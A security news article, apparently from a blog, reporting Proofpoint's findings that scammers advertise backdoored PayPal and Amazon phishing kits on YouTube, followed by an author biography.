Scammers advertise backdoored phishing templates on YouTube

Security experts from Proofpoint firm observed scammers exploiting YouTube to promote their backdoored phishing templates.

According to experts from the security firm Proofpoint, scammers are advertising on YouTube backdoored phishing templates offering also “how-to” videos and manuals.

It is not a novelty, cyber criminals are switching on legitimate websites to propose their products and services.

Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube, a query for “paypal scama” returns over 114,000 results.

The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.

“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.

The videos show the appearance of the templated and provide instruct to the potential buyers on how to steal information from the victims with phishing attacks.

The post shows as an example of these malicious kits, an Amazon phishing template that replicates the legitimate login page of the popular website.

Loading video

The researchers downloaded one of the kits advertised on YouTube and analyzed it discovering that the clumsy scammer left his Gmail address hardcoded in the template alongside with an email address used to receive the stolen credentials from the template.

The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.

“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.

The researchers noticed that many videos have been posted for months, a circumstance that suggests the lack of filtering mechanisms implemented by YouTube.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.

Stay Tuned.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – phishing templates, cybercrime)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.